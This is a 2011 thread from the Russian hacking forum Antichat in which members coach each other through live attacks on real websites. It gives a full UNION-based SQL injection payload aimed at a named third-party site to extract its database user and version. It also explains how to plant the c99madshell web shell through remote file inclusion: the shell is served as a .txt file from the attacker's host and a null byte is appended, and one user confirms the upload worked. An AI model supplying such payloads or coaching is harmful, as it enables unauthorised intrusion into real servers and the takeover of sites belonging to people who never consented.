ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.01.2011, 11:33
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Код:
$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a
Вообще-то исходя из логики, то запрос первый запрос должен вернуть ноль строк, что бы нужные данные, т.е.

Код:
SELECT id, text FROM sqltable WHERE id = 0 UNION SELECT 1, 2
и ID = 0 только в том случае если нулевого айди нет в таблицы, либо любой другой символ. Или же

Код:
SELECT id, text FROM sqltable WHERE id = 1 AND 1=0 UNION SELECT 1, 2
в данном случае запись с id = 1 существует в базе, но так как 1 не равно 0 то нам вернут нужный ответ.
 
Ответить с цитированием

  #2  
Старый 09.01.2011, 13:51
villagay
Новичок
Регистрация: 07.01.2011
Сообщений: 1
С нами: 8076566

Репутация: 0
По умолчанию

помогите раскуртить

http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а

http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
 
Ответить с цитированием

  #3  
Старый 09.01.2011, 14:04
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от villagay  
помогите раскуртить
http://prostitutki-vip.com/anketa.php?id=-123+order+by+1 - все ок , а
http://prostitutki-vip.com/anketa.php?id=-123+union+select+1 без результата
собственно в чем проблема?

Код:
http://prostitutki-vip.com/anketa.php?id=69+and+1=0+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
 
Ответить с цитированием

  #4  
Старый 09.01.2011, 14:06
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

проблема в том что статьи про скули разучились читать(
 
Ответить с цитированием

  #5  
Старый 09.01.2011, 14:31
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от Onkelz  
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.
ххх.com/index.php?con=http://site.com/c99madshell
на страице открывает шелл , с моим сайтом. ТАк должно быть ?
потом перехожу
ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?
Если нада доп. инфа говорите.
Ну тут два варианта, либо это RFI, либо просто фрейм.

В случае РФИ код веб-шелл должен просто исполнится на стороне атакуемого сервера. Из твоего поста не понятно, какое расширение у веб-шелла на твоем сайте, и не понятно что он в итоге у тебя вывел.

Так что дай больше информации
 
Ответить с цитированием

  #6  
Старый 09.01.2011, 14:53
Onkelz
Познающий
Регистрация: 22.09.2010
Сообщений: 38
С нами: 8230646

Репутация: -1
По умолчанию

РОсширение .php.

НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
 
Ответить с цитированием

  #7  
Старый 09.01.2011, 15:12
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами: 8328566

Репутация: 935


По умолчанию

Цитата:
Сообщение от Onkelz  
РОсширение .php.
НУ типа окрывает шелл, какбудто он на моем сайте, ну содержимое мого сайта показивает.
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?

Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
 
Ответить с цитированием

  #8  
Старый 09.01.2011, 15:25
iget
Новичок
Регистрация: 29.03.2009
Сообщений: 8
С нами: 9010347

Репутация: 0
По умолчанию

Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
 
Ответить с цитированием

  #9  
Старый 09.01.2011, 16:06
Onkelz
Познающий
Регистрация: 22.09.2010
Сообщений: 38
С нами: 8230646

Репутация: -1
По умолчанию

Цитата:
Сообщение от Expl0ited  
Хм... это получается, он на твоем сайте сначала исполняет код, потом дает результат?
Тогда у тебя ничего не выйдет. На своем сайте смени расширение на .txt например и пробую инклюдить на атакуемом http://vuln/bug?remote=http://hack/shell.txt?
До он исполняет на моем сайте, и потом лдает результат. ЩА тестану , и отпишусь.

UPD: Залил) помогло добавления нулл байта после .txt)

СПасибо за помощь! Лови +
 
Ответить с цитированием

  #10  
Старый 10.01.2011, 04:33
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

Цитата:
Сообщение от iget  
Посоветуйте софт\ скрипт, который парсил бы мой список сайтов на принадлежность к опредленному движку.
GetEngine.pl - скрипт для определения имени\версии движка

ТиЦ
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 11 (пользователей: 0 , гостей: 11)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.